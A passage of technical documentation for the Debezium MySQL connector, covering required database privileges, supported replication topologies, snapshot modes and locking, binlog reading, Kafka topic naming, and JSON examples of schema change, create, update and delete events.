`SHOW DATABASE` statement; used only when performing a snapshot\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_replication-slave[`REPLICATION SLAVE`] - enables the connector to connect to and read the binlog of its MySQL server; always required for the connector\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_replication-client[`REPLICATION CLIENT`] - enables the use of `SHOW MASTER STATUS`, `SHOW SLAVE STATUS`, and `SHOW BINARY LOGS`; always required for the connector\n\nFor example, the following statement grants these permissions for a user `debezium` that authenticates with the password `dbz`, where the user can be on any machine:\n\n GRANT SELECT, RELOAD, SHOW DATABASES, REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'debezium' IDENTIFIED BY 'dbz';\n\n[WARNING]\n====\nChoose a good password that is different from what we use above.\n\nAlso, the above grant is equivalent to specifying any authenticating client on _any_ hosts, so obviously this is not recommended for production. Instead, in production you would almost certainly limit the replication user to the machine(s) where the MySQL connector is running within a Kafka Connect service, such as `... 'debezium'@'connect.host.acme.com' ...`.\n====\n\n[IMPORTANT]\n====\nWhen using the MySQL connector with https:\/\/aws.amazon.com\/rds\/mysql\/[Amazon RDS], https:\/\/aws.amazon.com\/rds\/aurora\/[Amazon Aurora (MySQL compatibility)], or any other server where the connector's database user is unable to obtain a global read lock, the database user must also have the `LOCK TABLES` permission. See the section on link:#snapshots-without-global-read-locks[snapshots without global read locks] and https:\/\/issues.jboss.org\/projects\/DBZ\/issues\/DBZ-140[DBZ-140] for additional details.\n====\n\n[[supported-mysql-topologies]]\n== Supported MySQL topologies\n\nThe MySQL connector can be used with a variety of MySQL topologies.\n\n[[mysql-standalone]]\n=== MySQL standalone\n\nWhen a single MySQL server is used by itself, then that server must have the binlog enabled (and optionally GTIDs enabled) so that the MySQL connector can be able to monitor it. This is often acceptable, since the binary log can also be used as an http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/backup-methods.html[incremental backup]. In this case, the MySQL connector will always connect to and follow this standalone MySQL server instance.\n\n[[mysql-master-and-slave]]\n=== MySQL master and slave\n\nhttp:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-solutions.html[MySQL replication] can be used to set up a cluster of MySQL instances, where one of the MySQL server instances is considered the _master_ and the other(s) a _slave_. Topologies can include single master with single slave, single master with multiple slaves, and multiple masters with multiple slaves. Which you choose will depend on your requirements, your backup and recovery strategy, and how you are scaling MySQL to handle large data volumes and queries.\n\nTo use the MySQL connector with one of these topologies, the connector can follow one of the masters or one of the slaves (if that slave has its binlog enabled), but the connector will see only those changes in the cluster that are visible to that server. Generally, this is not a problem except for the multi-master topologies.\n\nThe connector records its position in the server's binlog, which is different on each server in the cluster. Therefore, the connector will need to follow just one MySQL server instance. If that server fails, it must be restarted or recovered before the connector can continue.\n\n[[mysql-clusters]]\n[[highly-available-mysql-clusters]]\n=== Highly Available MySQL clusters\n\nA https:\/\/dev.mysql.com\/doc\/mysql-ha-scalability\/en\/[variety of high availability solutions] exist for MySQL, and they make it far easier to tolerate and almost immediately recover from problems and failures. Most HA MySQL clusters use GTIDs so that slaves are able to keep track of all changes on any of the master.\n\n\n[[multi-master-mysql]]\n=== Multi-Master MySQL\n\nA https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/mysql-cluster-replication-multi-master.html[multi-master MySQL] topology uses one or more MySQL slaves that each replicate from _multiple_ masters. This is a powerful way to aggregate the replication of multiple MySQL clusters, and requires using GTIDs.\n\nAs of Debezium 0.3.5, the Debezium MySQL connector can use these multi-master MySQL slaves as sources, and can fail over to _different_ multi-master MySQL slaves as long as thew new slave is caught up to the old slave (e.g., the new slave has all of the transactions that were last seen on the first slave). This works even if the connector is only using a subset of databases and\/or tables, as the connector can be configured to include or exclude specific GTID sources when attempting to reconnect to a new multi-master MySQL slave and find the correct position in the binlog.\n\n[[hosted-mysql]]\n=== Hosted MySQL\n\nAs of Debezium 0.4.0, the MySQL connector adds preliminary support for https:\/\/aws.amazon.com\/rds\/mysql\/[Amazon RDS] and https:\/\/aws.amazon.com\/rds\/aurora\/[Amazon Aurora (MySQL compatibility)]. The connector works as usual when reading the binlog, but in these environments the link:#snapshots-without-global-read-locks[connector does perform snapshots differently]. This is because these hosted forms of MySQL prevent database users from being able to obtain a global read lock, so the only way for the connector to obtain a consistent snapshot is to use table-level locks instead. Unfortunately, table-level locks link:https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/lock-tables-and-transactions.html[affect current transactions], and this means that the locks cannot be released until after the connector completes reading all data and commits its transaction.\n\n\n[[how-it-works]]\n[[how-the-mysql-connector-works]]\n== How the MySQL connector works\n\nThis section goes into detail about how the MySQL connector tracks the structure of the tables, performs snapshots, transform binlog events into Debezium change events, where those events are recorded in Kafka, and how the connector behaves when things go wrong.\n\n[[database-schema-history]]\n=== Database schema history\n\nWhen a database client queries a database, it uses the database's current schema. However, the database schema can be changed at any time, which means that the connector must know what the schema looked like at the time each insert, update, or delete operation is _recorded_. It can't just use the current schema, either, since it may be processing events that are relatively old and may have been recorded before the tables' schemas were changed. Luckily, MySQL includes in the binlog the row-level changes to the data _and_ the DDL statements that are applied to the database. As the connector reads the binlog and comes across these DDL statements, it parses them and updates an in-memory representation of each table's schema, which is then used to understand the structure of the tables at the time each insert, update, or delete occurs and to produce the appropriate change event. It also records in a separate _database history_ Kafka topic all of the DDL statements along with the position in the binlog where each DDL statement appeared.\n\nWhen the connector restarts after having crashed or been stopped gracefully, the connector will start reading the binlog from a specific position (i.e., a specific point in time). The connector rebuilds the table structures that existed _at this point in time_ by reading the database history Kafka topic and parsing all DDL statements up until the point in the binlog where the connector is starting.\n\nThis database history topic is for connector use only, but the connector can optionally generate _schema change events_ on a different topic that is intended for consumer applications. We'll cover this in the link:#schema-change-topic[Schema Change Topic] section.\n\n[NOTE]\n====\nIt is vital that there is a global order of the events in the database schema history, therefore the database history topic must not be partitioned.\nThis means a partition count of 1 must be specified when creating this topic.\nWhen relying on auto topic creation, make sure that Kafka's `num.partitions` configuration option (the default number of partitions) is set to 1.\n====\n\n[[snapshots]]\n=== Snapshots\n\nWhen a MySQL connector that is configured to follow a MySQL server instance is first started, it will by default perform an initial _consistent snapshot_ of a database. This is the default mode, since much of the time the MySQL binlogs no longer contain the complete history of the database.\n\nThe connector performs the following steps each time it takes a snapshot:\n\n1. Grab a global read lock that blocks writes by other database clients.\n2. Start a transaction with https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/innodb-consistent-read.html[_repeatable read_ semantics] to ensure that all subsequent reads within this transaction are done against a single consistent snapshot.\n3. Read the current position of the binlog.\n4. Read the schema of the databases and tables allowed by the connector's configuration.\n5. Release the global read lock, allowing other DB clients to again write to the database\n6. Optionally write the DDL changes to the _schema change topic_, including all necessary `DROP ...` and `CREATE ...` DDL statements\n7. Scans all of the database tables and generates on the appropriate table-specific Kafka topics `CREATE` events for each row.\n8. Commit the transaction.\n9. Record in the connector offsets that the connector successfully completed the snapshot.\n\nThe transaction started in step 1 does not prevent other clients from making changes to the tables rows, but will instead provide the connector with a consistent and unchanging view of the data in the tables. However, the transaction does not prevent other clients from applying DDL, which could interfere with the connector's attempt to read the binlog position and the table schemas. So, the connector obtains a global read lock in step 2 to prevent such problems, and it keeps this lock for a very short period of time while it reads the binlog position and table schemas in steps 3 and 4. This global read lock is released in step 5, before the connector performs the bulk of the work of copying the data.\n\nIf the connector fails, is rebalanced, or stops before the snapshot is complete, the connector will begin a new snapshot when it is restarted. Once the connector does complete its initial snapshot, the MySQL connector then proceeds to read the binlog from the position read during step 3, ensuring that the connector does not miss any updates. If the connector stops again for any reason, upon restart it will simply continue reading the binlog where it previously left off. However, if the connector remains stopped for long enough, MySQL might purge older binlog files and the connector's last position may be lost. In this case, when the connector configured with _initial_ snapshot mode (the default) is finally restarted, the MySQL server will no longer have the starting point and the connector will fail with an error.\n\nA second snapshot mode allows the connector to perform snapshots _whenever necessary_. This behavior is similar to the default _initial_ snapshot behavior mentioned above, except with one exception: if the connector is restarted _and_ MySQL no longer has its starting point in the binlog, rather than failing the connector will instead perform another snapshot. This mode is perhaps the most automated, but at the risk of performing additional snapshots when things go wrong (generally when the connector is down too long).\n\nThe third snapshot mode ensures the connector _never_ performs snapshots. When a new connector is configured this way, it will start reading the binlog from the beginning. This is not the default behavior because starting a new connector in this mode (without a snapshot) requires the MySQL binlog contain the entire history of all monitored databases, and MySQL instances are rarely configured this way. Specifically, the binlog must contain at least the `CREATE TABLE ...` statement for every monitored table. If this requirement is not satisfied, the connector will not be able to properly interpret the structure of the low-level events in the binlog, and it will simply skip all events for those missing table definitions. (The connector cannot rely upon the current definition of those tables, since the tables may have been altered after the initial events were recorded in the binlog, preventing the connector from properly interpreting the binlog events.)\n\nAs of 0.3.4, a fourth snapshot mode allows the connector to start reading the MySQL binlog from its current position when the connector is started. With the `schema_only` mode the connector reads the current binlog position, captures the current table schemas without reading any data, and then proceeds to read the binlog from its current position. This happens very quickly, and the resulting change event streams include only those change events that occurred *after the snapshot started*. This may be useful for consumers that don't need to know the complete state of the database but only need to know the changes that were made since the connector was started.\n\nAs of 0.7.2, a fifth snapshot mode `schema_only_recovery` allows an existing connector to recover a corrupted or lost database history topic. It behaves similarly to `schema_only`, in that it captures the current table schemas without reading any data. The differences are:\n\n* It can only be used on an existing connector, as an update to the connector's configuration.\n* It begins reading the binlog at the last committed offset for this existing connector, rather than the binlog's current position.\n\n`schema_only_recovery` can also be used to periodically \"clean up\" a database history topic (which requires infinite retention) that may be growing unexpectedly. To do this, the database history topic must be manually deleted before updating the connector's snapshot mode to `schema_only_recovery`.\nNote that this mode is safe to use *only* if no schema changes have happened after the committed offset.\nOtherwise, the binlog events between the committed offset and the binlog position with the schema change will be emitted with an inconsistent schema\n(already based on the altered schema, which didn't apply yet for these previous events).\nIt is therefore recommended -- once recovery of the history topic has succeeded -- to return to one of the other snapshotting modes, to prevent further snapshots after subsequent restarts of the connector.\n\nBecause of how the connector records offsets when performing a snapshot, the connector now defaults to `include.schema.events=true`. This writes all DDL changes performed during a snapshot to a topic that can be consumed by apps. And, more importantly, during the final step mentioned above it ensures that the updated offsets are recorded immediately (rather than waiting until a database change occurs).\n\n[[snapshots-without-global-read-locks]]\n==== Snapshots without global read locks\n\nSome MySQL environments, including https:\/\/aws.amazon.com\/rds\/mysql\/[Amazon RDS] and https:\/\/aws.amazon.com\/rds\/aurora\/[Amazon Aurora (MySQL compatibility)], do not allow users to obtain global read locks. As of 0.4.0, when the MySQL connector detects that a global read lock is not allowed, it falls back to table-level locks (requiring the database user also has the `LOCK TABLES` privilege) and performs a snapshot using these steps:\n\n1. Start a transaction with https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/innodb-consistent-read.html[_repeatable read_ semantics] to ensure that all subsequent reads within this transaction are done against a single consistent snapshot.\n2. Fail to obtain a global read lock to block writes by other database clients.\n3. Read names of the databases and tables, filtering them using the connector's configuration.\n4. Acquire a table-level lock on all configured tables.\n4. Read the current position of the binlog.\n5. Read the schema of all configured databases and tables.\n6. Optionally write the DDL changes to the _schema change topic_, including all necessary `DROP ...` and `CREATE ...` DDL statements\n7. Scans all of the database tables and generates on the appropriate table-specific Kafka topics `CREATE` events for each row.\n8. Commit the transaction.\n9. Release the table-level locks.\n10. Record in the connector offsets that the connector successfully completed the snapshot.\n\nNote that the _table-level locks are held for nearly all of the consistent snapshot_, including the reading of all database table content in step 7. This is very different than when a global read lock can be used, since that is held for a very short period of time. Unfortunately, this is the only way that the MySQL connector can obtain a consistent snapshot, since https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/lock-tables-and-transactions.html[releasing the table-level locks implicitly commits any open transaction held by the session]. Since we need the transaction to obtain a consistent snapshot of the database content, we are unable to release the table-level locks until after we've read the data in step 7 and committed our transaction in step 8.\n\n\n\n[[reading-the-binlog]]\n=== Reading the MySQL binlog\n\nThe MySQL connector will typically spend the vast majority of its time reading the binlog of the MySQL server to which it is connected.\n\nAs the MySQL connector reads the binlog, it transforms the binary log events into Debezium _create_, _update_, or _delete_ events that include the position in the binlog (including GTIDs if they are used) where the event was found. The MySQL connector forwards these change events to the Kafka Connect framework (running in the same process), which then synchronously writes them to the appropriate Kafka topic. Kafka Connect uses the term _offset_ for the source-specific position information that Debezium includes with each event, and Kafka Connect periodically records the most recent offset in another Kafka topic.\n\nWhen Kafka Connect gracefully shuts down, it stops the connectors, flushes all events to Kafka, and records the last offset received from each connector. Upon restart, Kafka Connect reads the last recorded offset for each connector, and starts the connector from that point. The MySQL connector uses the binlog filename, the position in that file, and the GTIDs (if they are enabled in MySQL server) recorded in its offset to request that MySQL send it the binlog events starting just after that position.\n\n[[topic-names]]\n=== Topics names\n\nThe MySQL connector writes events for all insert, update, and delete operations on a single table to a single Kafka topic. The name of the Kafka topics always takes the form _serverName_._databaseName_._tableName_, where _serverName_ is the logical name of the connector as specified with the `database.server.name` configuration property, _databaseName_ is the name of the database where the operation occurred, and _tableName_ is the name of the database table on which the operation occurred.\n\nFor example, consider a MySQL installation with an `inventory` database that contains four tables: `products`, `products_on_hand`, `customers`, and `orders`. If the connector monitoring this database were given a logical server name of `fulfillment`, then the connector would produce events on these four Kafka topics:\n\n* `fulfillment.inventory.products`\n* `fulfillment.inventory.products_on_hand`\n* `fulfillment.inventory.customers`\n* `fulfillment.inventory.orders`\n\n[[schema-change-topic]]\n=== Schema change topic\n\nIt is often useful for applications to consume events that describe the changes in the database schemas, so the MySQL connector can be configured to produce _schema change events_ with all of the DDL statements applied to databases in the MySQL server. When enabled, the connector writes all such events to a Kafka topic named _serverName_, where _serverName_ is the logical name of the connector as specified with the `database.server.name` configuration property. In our previous example where the logical server name is `fulfillment`, the schema change events would be recorded in the topic `fulfillment`.\n\n[IMPORTANT]\n====\nThe link:#database-schema-history[database history topic] and _schema change topic_ both contain events with the DDL statement. However, we've designed the events on the schema change topic to be easier to consume, so they are more granular and always have the database name. If you're going to consume schema change events, be sure to use the schema change topic and _never_ consume the database history topic.\n====\n\n[NOTE]\n====\nIn order to keep the correct order of schema changes, the schema change topic must not be partitioned.\nThis means a partition count of 1 must be specified when creating this topic.\nWhen relying on auto topic creation, make sure that Kafka's `num.partitions` configuration option (the default number of partitions) is set to 1.\n====\n\nEach message written to the schema change topic will have a message key that contains the name of the database to which the client was connected and using when they applied the DDL statement(s):\n\n[source,json,indent=0]\n----\n {\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeKey\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\"\n }\n }\n----\n\nMeanwhile, the schema change event message's value will contain a structure containing the DDL statement(s), the database to which the statements were _applied_, and the position in the binlog where the statement(s) appeared:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n {\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeValue\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"ddl\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"source\",\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.Source\",\n \"optional\": false,\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ]\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\",\n \"ddl\": \"CREATE TABLE products ( id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) NOT NULL, description VARCHAR(512), weight FLOAT ); ALTER TABLE products AUTO_INCREMENT = 101;\",\n \"source\" : {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 0,\n \"ts_sec\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"snapshot\": true,\n \"thread\": null,\n \"db\": null,\n \"table\": null,\n \"query\": null\n }\n }\n }\n----\n\nThe `ddl` field may contain multiple DDL statements, but every statement in the event will apply to the database named in the `databaseName` field and they will appear in the same order as applied to the database. Additionally, all of the events in the schema change topic will appear in the same order as applied to the MySQL server.\n\n[TIP]\n====\nThe `source` field is the exact same structure that appears in normal data change events written to table-specific topics. You can use the contents of this field to correlate the events on different topics.\n====\n\nAs mentioned above, each schema change event will contain one or more DDL statements that apply to a single database. What happens if a client submits a series of DDL statements that apply to _multiple_ databases (e.g., perhaps they use fully-qualified names)? If MySQL applies those statements atomically (e.g., as a single transaction), then the connector will take those DDL statements _in order_, group them by the affected database, and then create a schema change event for each of those groups. On the other hand, if MySQL applies those statements individually, then the connector will create a separate schema change event for each statement.\n\n[[events]]\n=== Events\n\nAll data change events produced by the MySQL connector have a key and a value, although the structure of the key and value depend on the table from which the change events originated (see link:#topic-names[Topic Names]).\n\n[NOTE]\n====\nStarting with Kafka 0.10, Kafka can optionally record with the message key and value the http:\/\/kafka.apache.org\/documentation.html#upgrade_10_performance_impact[_timestamp_] at which the message was created (recorded by the producer) or written to the log by Kafka.\n====\n\n[WARNING]\n====\nAs of Debezium 0.3, the Debezium MySQL connector ensures that all Kafka Connect _schema names_ are http:\/\/avro.apache.org\/docs\/current\/spec.html#names[valid Avro schema names]. This means that the logical server name must start with Latin letters or an underscore (e.g., [a-z,A-Z,\\_]), and the remaining characters in the logical server name and all characters in the database and table names must be Latin letters, digits, or an underscore (e.g., [a-z,A-Z,0-9,\\_]). If not, then all invalid characters will automatically be replaced with an underscore character.\n\nThis can lead to unexpected conflicts in schemas names when the logical server name, database names, and table names contain other characters, and the only distinguishing characters between table full names are invalid and thus replaced with underscores.\n====\n\nDebezium and Kafka Connect are designed around _continuous streams of event messages_, and the structure of these events may change over time. This could be difficult for consumers to deal with, so to make it very easy Kafka Connect makes each event self-contained. Every message key and value has two parts: a _schema_ and _payload_. The schema describes the structure of the payload, while the payload contains the actual data.\n\n[[change-events-key]]\n==== Change event's key\n\nFor a given table, the change event's key will have a structure that contains a field for each column in the primary key (or unique key constraint) of the table at the time the event was created. Consider an `inventory` database with a `customers` table defined as:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nEvery change event for the `customers` table while it has this definition will feature the same key structure, which in JSON looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Key\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"id\",\n \"type\": \"int32\",\n \"optional\": false\n }\n ]\n },\n \"payload\": {\n \"id\": 1001\n }\n }\n----\n\nThe `schema` portion of the key contains a Kafka Connect schema describing what is in the payload portion, and in our case that means that the `payload` value is not optional, is a structure defined by a schema named `mysql-server-1.inventory.customers.Key`, and has one required field named `id` of type `int32`. If we look at the value of the key's `payload` field, we'll see that it is indeed a structure (which in JSON is just an object) with a single `id` field, whose value is `1004`.\n\nTherefore, we interpret this key as describing the row in the `inventory.customers` table (output from the connector named `mysql-server-1`) whose `id` primary key column had a value of `1004`.\n\n[NOTE]\n====\nAlthough the `column.blacklist` configuration property allows you to remove columns from the event values, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key will be null. This makes sense since the rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\n[[change-events-value]]\n==== Change event's value\n\nThe value of the change event message is a bit more complicated. Like the key message, it has a _schema_ section and _payload_ section. Starting with Debezium 0.2, the payload section of every change event value produced by the MySQL connector has an _envelope_ structure with the following fields:\n\n* `op` is a mandatory field that contains a string value describing the type of operation. Values for the MySQL connector are `c` for create (or insert), `u` for update, `d` for delete, and `r` for read (in the case of a non-initial snapshot).\n* `before` is an optional field that if present contains the state of the row _before_ the event occurred. The structure will be described by the `mysql-server-1.inventory.customers.Value` Kafka Connect schema, which the `mysql-server-1` connector uses for all rows in the `inventory.customers` table.\n* `after` is an optional field that if present contains the state of the row _after_ the event occurred. The structure is described by the same `mysql-server-1.inventory.customers.Value` Kafka Connect schema used in `before`.\n* `source` is a mandatory field that contains a structure describing the source metadata for the event, which in the case of MySQL contains several fields: the Debezium version, the connector name, the name of the binlog file where the event was recorded, the position in that binlog file where the event appeared, the row within the event (if there is more than one), whether this event was part of a snapshot, name of the affected database and table, id of the MySQL thread creating the event (non-snapshot events only), and if available the MySQL server ID, and the timestamp in seconds. For non-snapshot events, if the MySQL server has the link:#enabling-query-log-events-optional[binlog_rows_query_log_events] option enabled, and the connector is configured with the `include.query` option enabled, the query field will contain the original SQL statement that generated the event.\n* `ts_ms` is optional and if present contains the time (using the system clock in the JVM running the Kafka Connect task) at which the connector processed the event.\n\nAnd of course, the _schema_ portion of the event message's value contains a schema that describes this envelope structure and the nested fields within it.\n\n[[create-events]]\nLet's look at what a _create_ event value might look like for our `customers` table:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"optional\": false,\n \"name\": \"mysql-server-1.inventory.customers.Envelope\",\n \"version\": 1,\n \"fields\": [\n {\n \"field\": \"op\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"before\",\n \"type\": \"struct\",\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ]\n },\n {\n \"field\": \"after\",\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Value\",\n \"optional\": true,\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ]\n },\n {\n \"field\": \"source\",\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.Source\",\n \"optional\": false,\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ]\n },\n {\n \"field\": \"ts_ms\",\n \"type\": \"int64\",\n \"optional\": true\n }\n ]\n },\n \"payload\": {\n \"op\": \"c\",\n \"ts_ms\": 1465491411815,\n \"before\": null,\n \"after\": {\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 0,\n \"ts_sec\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"snapshot\": false,\n \"thread\": 7,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"query\": \"INSERT INTO customers (first_name, last_name, email) VALUES ('Anne', 'Kretchmar', 'annek@noanswer.org')\"\n }\n }\n}\n----\n\nIf we look at the `schema` portion of this event's _value_, we can see the schema for the _envelope_, the schema for the `source` structure (which is specific to the MySQL connector and reused across all events), and the table-specific schemas for the `before` and `after` fields.\n\n[TIP]\n====\nThe names of the schemas for the `before` and `after` fields are of the form \"_logicalName_._tableName_.Value\", and thus are entirely independent from all other schemas for all other tables. This means that when using the link:\/docs\/faq\/#avro-converter[Avro Converter], the resulting Avro schemas for _each table_ in each _logical source_ have their own evolution and history.\n====\n\nIf we look at the `payload` portion of this event's _value_, we can see the information in the event, namely that it is describing that the row was created (since `op=c`), and that the `after` field value contains the values of the new inserted row's' `id`, `first_name`, `last_name`, and `email` columns.\n\n[TIP]\n====\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is true, because the JSON representation must include the _schema_ and the _payload_ portions of the message. It is possible and even recommended to use the link:\/docs\/faq\/#avro-converter[Avro Converter] to dramatically decrease the size of the actual messages written to the Kafka topics.\n====\n\n[[update-events]]\nThe value of an _update_ change event on this table will actually have the exact same _schema_, and its payload will be structured the same but will hold different values. Here's an example:\n\nHere's that new event's _value_ formatted to be easier to read:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": {\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": {\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 223344,\n \"ts_sec\": 1465581,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 484,\n \"row\": 0,\n \"snapshot\": false,\n \"thread\": 7,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"query\": \"UPDATE customers SET first_name='Anne Marie' WHERE id=1004\"\n },\n \"op\": \"u\",\n \"ts_ms\": 1465581029523\n }\n}\n----\n\nWhen we compare this to the value in the _insert_ event, we see a couple of differences in the `payload` section:\n\n* The `op` field value is now `u`, signifying that this row changed because of an update\n* The `before` field now has the state of the row with the values before the database commit\n* The `after` field now has the updated state of the row, and here was can see that the `first_name` value is now `Anne Marie`.\n* The `source` field structure has the same fields as before, but the values are different since this event is from a different position in the binlog.\n* The `ts_ms` shows the timestamp that Debezium processed this event.\n\nThere are several things we can learn by just looking at this `payload` section. We can compare the `before` and `after` structures to determine what actually changed in this row because of the commit. The `source` structure tells us information about MySQL's record of this change (providing traceability), but more importantly this has information we can compare to other events in this and other topics to know whether this event occurred before, after, or as part of the same MySQL commit as other events.\n\n[NOTE]\n====\nWhen the columns for a row's primary\/unique key are updated, the value of the row's key has changed so Debezium will output _three_ events: a `DELETE` event and link:#tombstone-events[tombstone event] with the old key for the row, followed by an `INSERT` event with the new key for the row.\n====\n\n[[delete-events]]\nSo far we've seen samples of _create_ and _update_ events. Now, let's look at the value of a _delete_ event for the same table. Once again, the `schema` portion of the value will be exactly the same as with the _create_ and _update_ events:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": {\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null,\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 223344,\n \"ts_sec\": 1465581,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 805,\n \"row\": 0,\n \"snapshot\": false,\n \"thread\": 7,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"query\": \"DELETE FROM customers WHERE id=1004\"\n },\n \"op\": \"d\",\n \"ts_ms\": 1465581902461\n }\n}\n----\n\nIf we look at the `payload` portion, we see a number of differences compared with the _create_ or _update_ event payloads:\n\n* The `op` field value is now `d`, signifying that this row was deleted\n* The `before` field now has the state of the row that was deleted with the database commit\n* The `after` field is null, signifying that the row no longer exists\n* The `source` field structure has many of the same values as before, except the `ts_sec` and `pos` fields have changed (and the `file` might have 